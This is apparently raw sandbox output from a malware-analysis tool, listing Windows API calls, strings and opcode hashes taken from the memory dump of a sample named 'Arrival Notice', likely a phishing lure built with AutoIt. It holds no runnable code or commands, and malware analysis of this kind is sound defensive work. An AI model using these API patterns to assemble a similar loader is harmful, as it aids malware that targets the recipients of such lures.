                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00429585
                  Similarity
                  • API ID: _wcslen$FileName$OpenSave
                  • String ID: X
                  • API String ID: 83654149-3081909835
                  • Opcode ID: 7a50a0d6970da13b70685ed0743154839506e6149f490ecd95f3583735c5e862
                  • Instruction ID: 75f19505e472d40cabd414c340769ba12f2188fb15cdc6c1075aef61bbf1ccd0
                  • Opcode Fuzzy Hash: 7a50a0d6970da13b70685ed0743154839506e6149f490ecd95f3583735c5e862
                  • Instruction Fuzzy Hash: 48E1D1316083109FD725DF24D881BAAB7E0BF85314F04896EF9899B3A2DB34DD45CB96
                  APIs
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  • BeginPaint.USER32(?,?,?), ref: 003C9241
                  • GetWindowRect.USER32(?,?), ref: 003C92A5
                  • ScreenToClient.USER32(?,?), ref: 003C92C2
                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003C92D3
                  • EndPaint.USER32(?,?,?,?,?), ref: 003C9321
                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004071EA
                    • Part of subcall function 003C9339: BeginPath.GDI32(00000000), ref: 003C9357
                  Similarity
                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                  • String ID:
                  • API String ID: 3050599898-0
                  • Opcode ID: aab5eeadcce07135792794d3e45833d1e63253d6bb49047e535ce7db07a3c501
                  • Instruction ID: 7cd3a7cd62f9888d3002ba88eb4d9c37cde7649eee2351f17456051357031f26
                  • Opcode Fuzzy Hash: aab5eeadcce07135792794d3e45833d1e63253d6bb49047e535ce7db07a3c501
                  • Instruction Fuzzy Hash: 5541AF74105200AFD711DF24CC88FAA7BA8EB4A320F050A6EF994DB2F1C7359C46DB66
                  APIs
                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0042080C
                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00420847
                  • EnterCriticalSection.KERNEL32(?), ref: 00420863
                  • LeaveCriticalSection.KERNEL32(?), ref: 004208DC
                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004208F3
                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00420921
                  Similarity
                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                  • String ID:
                  • API String ID: 3368777196-0
                  • Opcode ID: 1447b1c808ce38506d13a80185833b7c00782cf40376509e1337440bbb98afd1
                  • Instruction ID: 5d48aaa98dc576b386f46e989fff82f65629fd9f8455eaad18136539bffb5d7e
                  • Opcode Fuzzy Hash: 1447b1c808ce38506d13a80185833b7c00782cf40376509e1337440bbb98afd1
                  • Instruction Fuzzy Hash: 5D415871A00205EFDF15AF64EC85A6AB7B9FF04300F1440A9E9049E297DB74DE64DBA8
                  APIs
                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0040F3AB,00000000,?,?,00000000,?,0040682C,00000004,00000000,00000000), ref: 0044824C
                  • EnableWindow.USER32(00000000,00000000), ref: 00448272
                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 004482D1
                  • ShowWindow.USER32(00000000,00000004), ref: 004482E5
                  • EnableWindow.USER32(00000000,00000001), ref: 0044830B
                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0044832F
                  Similarity
                  • API ID: Window$Show$Enable$MessageSend
                  • String ID:
                  • API String ID: 642888154-0
                  • Opcode ID: e103869ae5b2967ea1ee8b3b2f2363f15b07ec1694072914ec15c2c3c771d942
                  • Instruction ID: ef82a6dad947ae3f042d415408c2562ba2d74a5c6fddc57da9bac76281ff4ecd
                  • Opcode Fuzzy Hash: e103869ae5b2967ea1ee8b3b2f2363f15b07ec1694072914ec15c2c3c771d942
                  • Instruction Fuzzy Hash: EF41B434601644AFEB11CF15C899BED7BE0BB0A715F1842BEE9084B372CB76AC41CB58
                  APIs
                  • IsWindowVisible.USER32(?), ref: 00414C95
                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00414CB2
                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00414CEA
                  • _wcslen.LIBCMT ref: 00414D08
                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00414D10
                  • _wcsstr.LIBVCRUNTIME ref: 00414D1A
                  Similarity
                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                  • String ID:
                  • API String ID: 72514467-0
                  • Opcode ID: b931143ebaa3fe052bfd62db0d68ccc4581ebb6b80e95bbc46493fd5cfc4023b
                  • Instruction ID: 258abbb8d62fceb5306e0035c5865d3824b515e462c754bfe1b621653a289881
                  • Opcode Fuzzy Hash: b931143ebaa3fe052bfd62db0d68ccc4581ebb6b80e95bbc46493fd5cfc4023b
                  • Instruction Fuzzy Hash: 1C2129762052007BEB165B35FC49EBB7B9CDF85750F15803EF805CE292EA65CC4193A4
                  APIs
                    • Part of subcall function 003B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B3A97,?,?,003B2E7F,?,?,?,00000000), ref: 003B3AC2
                  • _wcslen.LIBCMT ref: 0042587B
                  • CoInitialize.OLE32(00000000), ref: 00425995
                  • CoCreateInstance.OLE32(0044FCF8,00000000,00000001,0044FB68,?), ref: 004259AE
                  • CoUninitialize.OLE32 ref: 004259CC
                  Similarity
                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                  • String ID: .lnk
                  • API String ID: 3172280962-24824748
                  APIs
                    • Part of subcall function 00410FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00410FCA
                    • Part of subcall function 00410FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00410FD6
                    • Part of subcall function 00410FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00410FE5
                    • Part of subcall function 00410FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00410FEC
                    • Part of subcall function 00410FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00411002
                  • GetLengthSid.ADVAPI32(?,00000000,00411335), ref: 004117AE
                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004117BA
                  • HeapAlloc.KERNEL32(00000000), ref: 004117C1
                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 004117DA
                  • GetProcessHeap.KERNEL32(00000000,00000000,00411335), ref: 004117EE
                  • HeapFree.KERNEL32(00000000), ref: 004117F5
                  Similarity
                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                  • String ID:
                  • API String ID: 3008561057-0
                  APIs
                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004114FF
                  • OpenProcessToken.ADVAPI32(00000000), ref: 00411506
                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00411515
                  • CloseHandle.KERNEL32(00000004), ref: 00411520
                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0041154F
                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00411563
                  Similarity
                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                  • String ID:
                  • API String ID: 1413079979-0
                  APIs
                  • GetLastError.KERNEL32(?,?,003D3379,003D2FE5), ref: 003D3390
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003D339E
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003D33B7
                  • SetLastError.KERNEL32(00000000,?,003D3379,003D2FE5), ref: 003D3409
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  APIs
                  • GetLastError.KERNEL32(?,?,003E5686,003F3CD6,?,00000000,?,003E5B6A,?,?,?,?,?,003DE6D1,?,00478A48), ref: 003E2D78
                  • _free.LIBCMT ref: 003E2DAB
                  • _free.LIBCMT ref: 003E2DD3
                  • SetLastError.KERNEL32(00000000,?,?,?,?,003DE6D1,?,00478A48,00000010,003B4F4A,?,?,00000000,003F3CD6), ref: 003E2DE0
                  • SetLastError.KERNEL32(00000000,?,?,?,?,003DE6D1,?,00478A48,00000010,003B4F4A,?,?,00000000,003F3CD6), ref: 003E2DEC
                  • _abort.LIBCMT ref: 003E2DF2
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  APIs
                    • Part of subcall function 003C9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C9693
                    • Part of subcall function 003C9639: SelectObject.GDI32(?,00000000), ref: 003C96A2
                    • Part of subcall function 003C9639: BeginPath.GDI32(?), ref: 003C96B9
                    • Part of subcall function 003C9639: SelectObject.GDI32(?,00000000), ref: 003C96E2
                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00448A4E
                  • LineTo.GDI32(?,00000003,00000000), ref: 00448A62
                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00448A70
                  • LineTo.GDI32(?,00000000,00000003), ref: 00448A80
                  • EndPath.GDI32(?), ref: 00448A90
                  • StrokePath.GDI32(?), ref: 00448AA0
                  Similarity
                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                  • String ID:
                  • API String ID: 43455801-0
                  APIs
                  • GetDC.USER32(00000000), ref: 00415218
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00415229
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00415230
                  • ReleaseDC.USER32(00000000,00000000), ref: 00415238
                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0041524F
                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00415261
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  APIs
                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B1BF4
                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 003B1BFC
                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003B1C07
                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B1C12
                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 003B1C1A
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B1C22
                  Similarity
                  • API ID: Virtual
                  • String ID:
                  • API String ID: 4278518827-0
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0041EB30
                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0041EB46
                  • GetWindowThreadProcessId.USER32(?,?), ref: 0041EB55
                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0041EB64
                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0041EB6E
                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0041EB75
                  Similarity
                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                  • String ID:
                  • API String ID: 839392675-0
                  APIs
                  • GetClientRect.USER32(?), ref: 00407452
                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00407469
                  • GetWindowDC.USER32(?), ref: 00407475
                  • GetPixel.GDI32(00000000,?,?), ref: 00407484
                  • ReleaseDC.USER32(?,00000000), ref: 00407496
                  • GetSysColor.USER32(00000005), ref: 004074B0
                  Similarity
                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                  • String ID:
                  • API String ID: 272304278-0
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041187F
                  • UnloadUserProfile.USERENV(?,?), ref: 0041188B
                  • CloseHandle.KERNEL32(?), ref: 00411894
                  • CloseHandle.KERNEL32(?), ref: 0041189C
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 004118A5
                  • HeapFree.KERNEL32(00000000), ref: 004118AC
                  Similarity
                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                  • String ID:
                  • API String ID: 146765662-0
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 003BBEB3
                  Strings
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID: D%H$D%H$D%H$D%HD%H
                  • API String ID: 1385522511-521877798
                  APIs
                    • Part of subcall function 003D0242: EnterCriticalSection.KERNEL32(0048070C,00481884,?,?,003C198B,00482518,?,?,?,003B12F9,00000000), ref: 003D024D
                    • Part of subcall function 003D0242: LeaveCriticalSection.KERNEL32(0048070C,?,003C198B,00482518,?,?,?,003B12F9,00000000), ref: 003D028A
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 003D00A3: __onexit.LIBCMT ref: 003D00A9
                  • __Init_thread_footer.LIBCMT ref: 00437BFB
                    • Part of subcall function 003D01F8: EnterCriticalSection.KERNEL32(0048070C,?,?,003C8747,00482514), ref: 003D0202
                    • Part of subcall function 003D01F8: LeaveCriticalSection.KERNEL32(0048070C,?,003C8747,00482514), ref: 003D0235
                  Strings
                  Similarity
                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                  • String ID: +T@$5$G$Variable must be of type 'Object'.
                  • API String ID: 535116098-2858914595
                  APIs
                    • Part of subcall function 003B7620: _wcslen.LIBCMT ref: 003B7625
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0041C6EE
                  • _wcslen.LIBCMT ref: 0041C735
                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0041C79C
                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0041C7CA
                  Strings
                  Similarity
                  • API ID: ItemMenu$Info_wcslen$Default
                  • String ID: 0
                  • API String ID: 1227352736-4108050209
                  APIs
                  • ShellExecuteExW.SHELL32(0000003C), ref: 0043AEA3
                    • Part of subcall function 003B7620: _wcslen.LIBCMT ref: 003B7625
                  • GetProcessId.KERNEL32(00000000), ref: 0043AF38
                  • CloseHandle.KERNEL32(00000000), ref: 0043AF67
                  Strings
                  Similarity
                  • API ID: CloseExecuteHandleProcessShell_wcslen
                  • String ID: <$@
                  • API String ID: 146682121-1426351568
                  APIs
                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00417206
                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0041723C
                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0041724D
                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004172CF
                  Strings
                  Similarity
                  • API ID: ErrorMode$AddressCreateInstanceProc
                  • String ID: DllGetClassObject
                  • API String ID: 753597075-1075368562
                  APIs
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00443E35
                  • IsMenu.USER32(?), ref: 00443E4A
                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00443E92
                  • DrawMenuBar.USER32 ref: 00443EA5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$Item$DrawInfoInsert
                  • String ID: 0
                  • API String ID: 3076010158-4108050209
                  • Opcode ID: 38e676a1d2337c7b04b05a385397dbfdf6a96c75e0f7f7e2afc328eec8368240
                  • Instruction ID: b6584746936e8855273003ff9f42eef3c93ff32c4104fa1d80ced627a93190fb
                  • Opcode Fuzzy Hash: 38e676a1d2337c7b04b05a385397dbfdf6a96c75e0f7f7e2afc328eec8368240
                  • Instruction Fuzzy Hash: 8D418875A02209EFEB10DF50D880AAABBB9FF49751F14402AE915AB350D334AE01CF54
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: HKEY_LOCAL_MACHINE$HKLM
                  • API String ID: 176396367-4004644295
                  • Opcode ID: f3129243059c14c0468a5412cc6641f1eb55e0fbdc5ddc539c9d88d397599f95
                  • Instruction ID: 92e3f44d62be930622c7e5ed89338b2401de44581198fea5b4b15a84b040218f
                  • Opcode Fuzzy Hash: f3129243059c14c0468a5412cc6641f1eb55e0fbdc5ddc539c9d88d397599f95
                  • Instruction Fuzzy Hash: 72310633A001698BCB21FF6C98D02BF33915BA9754F15902BE845BB344EB79CD4093A8
                  APIs
                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00442F8D
                  • LoadLibraryW.KERNEL32(?), ref: 00442F94
                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00442FA9
                  • DestroyWindow.USER32(?), ref: 00442FB1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$DestroyLibraryLoadWindow
                  • String ID: SysAnimate32
                  • API String ID: 3529120543-1011021900
                  • Opcode ID: ebaf1ee404eace6f77812c5864f42a4e71f6d23866fcce93449f14b6d180b6b9
                  • Instruction ID: ab0d3b6d8fa5c9d038e37c01f37c3ce9fa1eebd3e81d8506a68e2b31edbd97ed
                  • Opcode Fuzzy Hash: ebaf1ee404eace6f77812c5864f42a4e71f6d23866fcce93449f14b6d180b6b9
                  • Instruction Fuzzy Hash: D021F071200205ABFB104F64DD81FBB77BDEB59368FD0422AF910D2290C7B5DC45A768
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003D4D1E,003E28E9,?,003D4CBE,003E28E9,004788B8,0000000C,003D4E15,003E28E9,00000002), ref: 003D4D8D
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003D4DA0
                  • FreeLibrary.KERNEL32(00000000,?,?,?,003D4D1E,003E28E9,?,003D4CBE,003E28E9,004788B8,0000000C,003D4E15,003E28E9,00000002,00000000), ref: 003D4DC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: ae72666d7805065b507032903e398ea243cd4d068b27d8f615d9331694a95628
                  • Instruction ID: 41dd0e4fac51b5b38b3b62447b30e712d51773b1802ebb86467c397c7017166c
                  • Opcode Fuzzy Hash: ae72666d7805065b507032903e398ea243cd4d068b27d8f615d9331694a95628
                  • Instruction Fuzzy Hash: 84F06839541208BBDB525F90DC89B9DBFB5EF44752F050166FC05A2251DB355D40CF94
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003B4EDD,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E9C
                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003B4EAE
                  • FreeLibrary.KERNEL32(00000000,?,?,003B4EDD,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4EC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                  • API String ID: 145871493-3689287502
                  • Opcode ID: 4f2042aa9e50e69859acf392c320ecb23883a9a26ef4862807ac6cfed141f617
                  • Instruction ID: 822b1e962a561b96b5b55c969501f909a4b21657c07cc25e6a37a14ce7e6eaac
                  • Opcode Fuzzy Hash: 4f2042aa9e50e69859acf392c320ecb23883a9a26ef4862807ac6cfed141f617
                  • Instruction Fuzzy Hash: 53E0CD39A035229BD2731B297C58B9F6554AF82F6770E4125FD04D2506DB64CD0189AD
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,003F3CDE,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E62
                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003B4E74
                  • FreeLibrary.KERNEL32(00000000,?,?,003F3CDE,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E87
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                  • API String ID: 145871493-1355242751
                  • Opcode ID: 0dca5675c43fa96af435169b61a815700dc7183c7def47bd8a69b0367bdeac93
                  • Instruction ID: f4deb2a6bea99d701bfaec45f2198e970e195191ee1b4ed51a6e5936b851a014
                  • Opcode Fuzzy Hash: 0dca5675c43fa96af435169b61a815700dc7183c7def47bd8a69b0367bdeac93
                  • Instruction Fuzzy Hash: EAD0C239503A216756631B247C08ECB2B18AF82B1930A0221BA04A2115CF24CD01C9EC
                  APIs
                  • GetCurrentProcessId.KERNEL32 ref: 0043A427
                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0043A435
                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0043A468
                  • CloseHandle.KERNEL32(?), ref: 0043A63D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$CloseCountersCurrentHandleOpen
                  • String ID:
                  • API String ID: 3488606520-0
                  • Opcode ID: cd910f65f5a25fc319052957bdd0150809ce6926158c41056bbf882ec579f9ac
                  • Instruction ID: 49d4d96db18b8b3c90446c81276d32ebbce3a53a55851a6673aec1ad9a6a6553
                  • Opcode Fuzzy Hash: cd910f65f5a25fc319052957bdd0150809ce6926158c41056bbf882ec579f9ac
                  • Instruction Fuzzy Hash: 46A1D271604300AFD724DF24C882F2AB7E1AF88714F14885DF59A9B7D2DB74EC418B92
                  APIs
                    • Part of subcall function 0041DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0041CF22,?), ref: 0041DDFD
                    • Part of subcall function 0041DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0041CF22,?), ref: 0041DE16
                    • Part of subcall function 0041E199: GetFileAttributesW.KERNEL32(?,0041CF95), ref: 0041E19A
                  • lstrcmpiW.KERNEL32(?,?), ref: 0041E473
                  • MoveFileW.KERNEL32(?,?), ref: 0041E4AC
                  • _wcslen.LIBCMT ref: 0041E5EB
                  • _wcslen.LIBCMT ref: 0041E603
                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0041E650
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                  • String ID:
                  • API String ID: 3183298772-0
                  • Opcode ID: 0678943bdb0a9ac1f8a8ae574292ba07c4beab8dffa50972c4649c4e681a8a96
                  • Instruction ID: 0b43eb42eb26b18f2b8a4f0afd36d55e08da0a70a5e898912f2fda76333c3c72
                  • Opcode Fuzzy Hash: 0678943bdb0a9ac1f8a8ae574292ba07c4beab8dffa50972c4649c4e681a8a96
                  • Instruction Fuzzy Hash: 885186B24083459BC725DB91DC81ADF73ECAF85344F00491FF689D7151EF78A588876A
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 0043C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0043B6AE,?,?), ref: 0043C9B5
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043C9F1
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA68
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043BAA5
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0043BB00
                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0043BB63
                  • RegCloseKey.ADVAPI32(?,?), ref: 0043BBA6
                  • RegCloseKey.ADVAPI32(00000000), ref: 0043BBB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
